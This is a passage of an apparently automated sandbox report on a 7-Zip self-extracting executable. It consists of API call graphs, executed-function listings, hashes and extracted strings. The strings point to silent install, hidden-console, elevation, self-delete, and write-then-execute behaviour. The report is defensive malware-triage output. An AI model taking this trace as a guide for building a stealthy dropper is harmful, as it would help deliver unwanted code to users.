calls 10329->10330 10331 4050d2 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050df 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050ec 10334->10335 10336 4048c7 2 API calls 10335->10336 10337 4050f9 10336->10337 10338 4048c7 2 API calls 10337->10338 10339 405106 10338->10339 10340 4048c7 2 API calls 10339->10340 10341 405113 10340->10341 10342 4013a9 2 API calls 10341->10342 10343 40511f 12 API calls 10342->10343 10344 4051b4 GetLastError 10343->10344 10345 4051d7 CreateJobObjectW 10343->10345 10346 4051bc ??3@YAXPAX ??3@YAXPAX 10344->10346 10347 405252 ResumeThread WaitForSingleObject 10345->10347 10348 4051ef AssignProcessToJobObject 10345->10348 10346->9850 10350 405262 CloseHandle GetExitCodeProcess 10347->10350 10348->10347 10349 4051fd CreateIoCompletionPort 10348->10349 10349->10347 10351 40520f SetInformationJobObject ResumeThread 10349->10351 10352 405288 CloseHandle 10350->10352 10353 40527f GetLastError 10350->10353 10356 40523d GetQueuedCompletionStatus 10351->10356 10354 405291 CloseHandle 10352->10354 10355 405294 10352->10355 10353->10352 10354->10355 10357 40529a CloseHandle 10355->10357 10358 40529f 10355->10358 10356->10347 10359 405237 10356->10359 10357->10358 10358->10346 10359->10350 10359->10356 10361 4023d9 10360->10361 10362 4023be LoadLibraryA GetProcAddress 10360->10362 10361->9836 10362->10361 10364 401458 2 API calls 10363->10364 10372 404dbf 10364->10372 10365 401370 2 API calls 10365->10372 10366 404e51 10367 404e8b ??3@YAXPAX 10366->10367 10369 404dae 3 API calls 10366->10369 10367->9791 10368 401526 2 API calls 10368->10372 10371 404e88 10369->10371 10370 4026b0 lstrcmpW 10370->10372 10371->10367 10372->10365 10372->10366 10372->10368 10372->10370 10374 407c87 4 API calls 10373->10374 10375 40449f 10374->10375 10375->9766 10376->9749 10378 4054b6 ??3@YAXPAX 10377->10378 10379 40531a 10377->10379 10381 4054bc 10378->10381 10379->10378 10380 40532e GetDriveTypeW 10379->10380 10380->10378 10382 40535a 10380->10382 10381->9752 10383 404545 6 API calls 10382->10383 10384 405368 CreateFileW 10383->10384 10385 405480 ??3@YAXPAX ??3@YAXPAX 10384->10385 10386 40538e 10384->10386 10385->10381 10387 401458 2 API calls 10386->10387 10388 405397 10387->10388 10389 401370 2 API calls 10388->10389 10390 4053a4 10389->10390 10391 4027c2 2 API calls 10390->10391 10392 4053b2 10391->10392 10393 401429 2 API calls 10392->10393 10394 4053be 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053cc 10395->10396 10397 4027c2 2 API calls 10396->10397 10398 4053d9 10397->10398 10399 401429 2 API calls 10398->10399 10400 4053e5 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053f2 10401->10402 10403 4027c2 2 API calls 10402->10403 10404 4053fb 10403->10404 10405 401429 2 API calls 10404->10405 10406 405407 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 405410 10407->10408 10409 402b20 3 API calls 10408->10409 10410 405422 WriteFile ??3@YAXPAX CloseHandle 10409->10410 10411 405450 10410->10411 10412 405491 10410->10412 10411->10412 10413 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10411->10413 10414 402ff3 16 API calls 10412->10414 10413->10385 10415 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10414->10415 10415->10381 10425 40250f 10416->10425 10420 401458 2 API calls 10419->10420 10421 402ae4 10420->10421 10422 402b1c 10421->10422 10423 4027aa 2 API calls 10421->10423 10422->9887 10424 402b01 MultiByteToWideChar 10423->10424 10424->10422 10426 402549 10425->10426 10427 40251d ??2@YAPAXI 10425->10427 10426->9887 10427->10426 10428 40252e ??3@YAXPAX 10427->10428 10428->10426 10431 401cc2 10430->10431 10433 401c82 10430->10433 10431->9897 10432 40ccb4 CharUpperW 10432->10433 10433->10431 10433->10432 10434 401ccf 10433->10434 10438 40ccb4 CharUpperW 10434->10438 10436 401cdf 10439 40ccb4 CharUpperW 10436->10439 10438->10436 10439->10431 10440->9921 10442 402390 GetNativeSystemInfo 10441->10442 10443 40239c 10441->10443 10442->9927 10443->9927 10447 40c998 10444->10447 10448 40c95f 2 API calls 10447->10448 10449 405be0 10448->10449 10449->9591 10449->9592 10500 4028b9 10450->10500 10453 4028b9 2 API calls 10454 403bc9 10453->10454 10504 402a0d 10454->10504 10457 4028f3 2 API calls 10458 403be6 ??3@YAXPAX 10457->10458 10459 402a0d 3 API calls 10458->10459 10460 403c01 10459->10460 10461 4028f3 2 API calls 10460->10461 10462 403c0c ??3@YAXPAX 10461->10462 10463 403c22 10462->10463 10464 403c4c 10462->10464 10463->10464 10465 403c27 wsprintfA 10463->10465 10466 403c52 wsprintfA 10464->10466 10467 403c79 10464->10467 10468 402953 2 API calls 10465->10468 10469 402953 2 API calls 10466->10469 10470 402953 2 API calls 10467->10470 10472 403c41 10468->10472 10473 403c6e 10469->10473 10471 403c86 10470->10471 10474 402953 2 API calls 10471->10474 10475 402953 2 API calls 10472->10475 10476 402953 2 API calls 10473->10476 10477 403c8e 10474->10477 10475->10464 10476->10467 10478 402bee 10477->10478 10479 402bfb 10478->10479 10487 40d041 3 API calls 10479->10487 10480 402c0d lstrlenA lstrlenA 10482 402c3a 10480->10482 10481 402d18 10489 4028f3 10481->10489 10482->10481 10483 402ce5 memmove 10482->10483 10484 402c85 memcmp 10482->10484 10485 402cc2 memcmp 10482->10485 10488 40d00d GetLastError 10482->10488 10519 40292b 10482->10519 10483->10481 10483->10482 10484->10481 10484->10482 10485->10482 10487->10480 10488->10482 10490 4028ff 10489->10490 10492 402910 10489->10492 10491 40250f 2 API calls 10490->10491 10491->10492 10492->9948 10494 40255b 2 API calls 10493->10494 10495 402999 10494->10495 10495->9962 10497 402962 10496->10497 10498 40255b 2 API calls 10497->10498 10499 40296f 10498->10499 10499->9948 10501 4028cf 10500->10501 10502 40250f 2 API calls 10501->10502 10503 4028dc 10502->10503 10503->10453 10505 402a28 10504->10505 10506 402a3f 10505->10506 10507 402a34 10505->10507 10508 402823 2 API calls 10506->10508 10516 40286b 10507->10516 10510 402a48 10508->10510 10511 40250f 2 API calls 10510->10511 10513 402a51 10511->10513 10512 402a3d 10512->10457 10514 40286b 2 API calls 10513->10514 10515 402a7f ??3@YAXPAX 10514->10515 10515->10512 10517 40250f 2 API calls 10516->10517 10518 402886 10517->10518 10518->10512 10522 40255b 10519->10522 10523 40259f 10522->10523 10524 40256f 10522->10524 10523->10482 10525 40250f 2 API calls 10524->10525 10525->10523 10527 402697 10526->10527 10528 40266f lstrcmpW 10526->10528 10527->9987 10529 402686 10528->10529 10529->10527 10529->10528 10533 402625 10530->10533 10531 402631 lstrcmpW 10532 40264e 10531->10532 10531->10533 10532->9987 10533->10531 10533->10532 10534->9987 10536 402d4b 10535->10536 10537 402d3f 10535->10537 10539 402823 2 API calls 10536->10539 10553 401bdf GetStdHandle WriteFile 10537->10553 10541 402d55 10539->10541 10540 402d46 10552 40269a ??3@YAXPAX ??3@YAXPAX 10540->10552 10542 402d80 10541->10542 10547 40292b 2 API calls 10541->10547 10543 402ad8 3 API calls 10542->10543 10544 402d92 10543->10544 10545 402da0 10544->10545 10546 402db4 10544->10546 10548 408dbf 57 API calls 10545->10548 10549 408dbf 57 API calls 10546->10549 10547->10541 10550 402daf ??3@YAXPAX ??3@YAXPAX 10548->10550 10549->10550 10550->10540 10552->9977 10553->10540 10555 4043c4 10554->10555 10566 4042ea 10555->10566 10559 40435a 10558->10559 10560 4042ea _wtol 10559->10560 10561 40437b 10560->10561 10561->10029 10563 40438b 10562->10563 10564 4042ea _wtol 10563->10564 10565 4043a3 10564->10565 10565->10035 10567 4042f4 10566->10567 10568 40430f _wtol 10567->10568 10569 404348 10567->10569 10568->10567 10569->10023 10598 410e26 10570->10598 10606 410329 _EH_prolog 10570->10606 10571 40112a 10571->10078 10571->10082 10575 401624 10574->10575 10576 401370 2 API calls 10575->10576 10577 401631 10576->10577 10578 401526 2 API calls 10577->10578 10579 40163a CreateThread 10578->10579 10580 401669 10579->10580 10581 40166e WaitForSingleObject 10579->10581 11005 4012e3 10579->11005 10582 40851f 25 API calls 10580->10582 10583 40168b 10581->10583 10584 4016bd 10581->10584 10582->10581 10587 4016a9 10583->10587 10589 40169a 10583->10589 10585 4016b9 10584->10585 10586 4016c5 GetExitCodeThread 10584->10586 10585->10084 10588 4016dc 10586->10588 10590 408dbf 57 API calls 10587->10590 10588->10585 10588->10589 10591 40170b SetLastError 10588->10591 10589->10585 10592 408dbf 57 API calls 10589->10592 10590->10585 10591->10589 10592->10585 10594 401458 2 API calls 10593->10594 10595 401489 10594->10595 10596 401458 2 API calls 10595->10596 10597 401495 10596->10597 10597->10087 10599 410e38 10598->10599 10605 40d041 3 API calls 10599->10605 10600 410e4c 10603 410e83 10600->10603 10604 40d041 3 API calls 10600->10604 10601 410e60 10601->10603 10622 410ccb 10601->10622 10603->10571 10604->10601 10605->10600 10607 410349 10606->10607 10608 410e26 11 API calls 10607->10608 10609 41036e 10608->10609 10610 410390 10609->10610 10611 410377 10609->10611 10650 4127aa _EH_prolog 10610->10650 10653 40ff49 10611->10653 10635 40e0d0 10622->10635 10624 410cf7 10624->10603 10625 410ce3 10625->10624 10638 40e036 10625->10638 10628 410d30 10629 410dc4 ??3@YAXPAX 10628->10629 10630 410dcf ??3@YAXPAX 10628->10630 10632 410dad memmove 10628->10632 10633 410dd9 memcpy 10628->10633 10629->10624 10630->10624 10632->10628 10634 40d041 3 API calls 10633->10634 10634->10630 10646 40e085 10635->10646 10639 40e080 memcpy 10638->10639 10640 40e043 10638->10640 10639->10628 10641 40e048 ??2@YAPAXI 10640->10641 10642 40e06e 10640->10642 10643 40e070 ??3@YAXPAX 10641->10643 10644 40e058 memmove 10641->10644 10642->10643 10643->10639 10644->10643 10647 40e0c9 10646->10647 10648 40e097 10646->10648 10647->10625 10648->10647 10649 40d00d GetLastError 10648->10649 10649->10648 10661 412525 10650->10661 10988 40fdd9 10653->10988 10683 40fc0a 10661->10683 10806 40fb7b 10683->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fb84 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fb8c 10809->10810 10811 40cdda ctype 3 API calls 10810->10811 10812 40fb94 10811->10812 10813 40cdda ctype 3 API calls 10812->10813 10814 40fb9c 10813->10814 10815 40cdda ctype 3 API calls 10814->10815 10816 40fba4 10815->10816 10817 40cdda ctype 3 API calls 10816->10817 10818 40fbac 10817->10818 10819 40cdda ctype 3 API calls 10818->10819 10820 40fbb6 10819->10820 10821 40cdda ctype 3 API calls 10820->10821 10822 40fbbe 10821->10822 10823 40cdda ctype 3 API calls 10822->10823 10824 40fbcb 10823->10824 10825 40cdda ctype 3 API calls 10824->10825 10826 40fbd3 10825->10826 10827 40cdda ctype 3 API calls 10826->10827 10828 40fbe0 10827->10828 10829 40cdda ctype 3 API calls 10828->10829 10830 40fbe8 10829->10830 10831 40cdda ctype 3 API calls 10830->10831 10832 40fbf5 10831->10832 10833 40cdda ctype 3 API calls 10832->10833 10834 40fbfd 10833->10834 10989 40cdda ctype 3 API calls 10988->10989 10990 40fde7 10989->10990 11006 4012ec 11005->11006 11007 4012ff 11005->11007 11006->11007 11008 4012ee Sleep 11006->11008 11009 401338 11007->11009 11010 40132a EndDialog 11007->11010 11008->11006 11010->11009 11012 40240b 11011->11012 11012->10093 11013->10145 11015 40133e 2 API calls 11014->11015 11016 4029c5 11015->11016 11017 40133e 2 API calls 11016->11017 11018 4029d1 11017->11018 11018->10188 11020 402823 2 API calls 11019->11020 11021 402b2f 11020->11021 11022 402b6b 11021->11022 11025 4028a1 11021->11025 11022->10213 11026 4028b3 WideCharToMultiByte 11025->11026 11027 4028ad 11025->11027 11026->11022 11028 40250f 2 API calls 11027->11028 11028->11026 11030 407d72 11029->11030 11031 407d6d 11029->11031 11030->11031 11032 407ce8 22 API calls 11030->11032 11031->10243 11032->11031 11033->10243 11034->10249 11035->10251 11036->10253 11037->10257 11038->10259 11039->10263 11040->10267 11041->10271 11043 407c87 4 API calls 11042->11043 11044 407e42 11043->11044 11044->10281 11049 407e53 11045->11049 11048->10285 11050 407c87 4 API calls 11049->11050 11051 407e5b 11050->11051 11051->10282 11052->10293 11054 407c87 4 API calls 11053->11054 11055 407e8d 11054->11055 11055->10298 11056->10301 8704 40c9e5 ReadFile

                                                                            Executed Functions

                                                                            Function 00405721 Relevance: 232.8, APIs: 93, Strings: 39, Instructions: 1811keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                                              • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                              • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                              • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                              • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                              • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                                              • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                              • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                            • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                                            • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                                              • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                              • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                              • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                              • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                              • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                                              • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                                            • _wtol.MSVCRT ref: 00405825
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                                            • _wtol.MSVCRT ref: 00405A25
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
                                                                            • wsprintfW.USER32 ref: 00405D2A
                                                                              • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                              • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                              • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                            • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                                              • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                              • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                              • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                                            • _wtol.MSVCRT ref: 00405F6B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                                            • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                                            • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                                            • CoInitialize.OLE32(00000000), ref: 004062F2
                                                                            • _wtol.MSVCRT ref: 00406338
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                                            • GetKeyState.USER32(00000010), ref: 004063BE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                                            • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                                            • _wtol.MSVCRT ref: 0040686C
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                                              • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                                              • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                              • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                                              • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                              • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                                              • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                                              • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                                              • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                                            • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                                            • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$8sa$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                                            • API String ID: 1141480454-2787303648
                                                                            • Opcode ID: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                            • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                                            • Opcode Fuzzy Hash: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                            • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D
                                                                            Function 00401815 Relevance: 22.8, APIs: 15, Instructions: 304COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 825 401815-401825 826 401831-40185c call 401132 call 41017a 825->826 827 401827-40182c 825->827 832 40185e 826->832 833 40186f-40187b call 401458 826->833 828 401b6f-401b72 827->828 835 401860-40186a call 40cb68 832->835 839 401b51-401b6c ??3@YAXPAX@Z call 40cb68 833->839 840 401881-401886 833->840 841 401b6e 835->841 839->841 840->839 842 40188c-4018c2 call 401370 call 401551 call 4013a9 ??3@YAXPAX@Z 840->842 841->828 852 401b37-401b3a 842->852 853 4018c8-4018e7 842->853 854 401b3c-401b4f ??3@YAXPAX@Z call 40cb68 852->854 858 401902-401906 853->858 859 4018e9-4018fd call 40cb68 ??3@YAXPAX@Z 853->859 854->841 861 401908-40190b 858->861 862 40190d-401912 858->862 859->835 864 40193a-401951 861->864 865 401934-401937 862->865 866 401914 862->866 864->859 869 401953-401976 864->869 865->864 867 401916-40191c 866->867 871 40191e-40192f call 40cb68 ??3@YAXPAX@Z 867->871 874 401991-401997 869->874 875 401978-40198c call 40cb68 ??3@YAXPAX@Z 869->875 871->835 878 4019b3-4019c5 GetLocalTime SystemTimeToFileTime 874->878 879 401999-40199c 874->879 875->835 883 4019cb-4019ce 878->883 881 4019a5-4019b1 879->881 882 40199e-4019a0 879->882 881->883 882->867 884 4019d0-4019da call 4036f1 883->884 885 4019e7-4019ee call 403387 883->885 884->871 892 4019e0-4019e2 884->892 888 4019f3-4019f8 885->888 890 401b23-401b32 GetLastError 888->890 891 4019fe-401a01 888->891 890->852 893 401a07-401a11 ??2@YAPAXI@Z 891->893 894 401b19-401b1c 891->894 892->867 895 401a22 893->895 896 401a13-401a20 893->896 894->890 898 401a24-401a48 call 40ef4a call 40ca5c 895->898 896->898 903 401afe-401b17 call 40f707 call 40cb68 898->903 904 401a4e-401a6c GetLastError call 40133e call 4030c7 898->904 903->854 913 401aa9-401abe call 4036f1 904->913 914 401a6e-401a75 904->914 920 401ac0-401ac8 913->920 921 401aca-401ae2 call 40ca5c 913->921 916 401a79-401a89 ??3@YAXPAX@Z 914->916 918 401a91-401aa4 call 40cb68 ??3@YAXPAX@Z 916->918 919 401a8b-401a8d 916->919 918->835 919->918 920->916 927 401ae4-401af3 GetLastError 921->927 928 401af5-401afd ??3@YAXPAX@Z 921->928 927->916 928->903
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
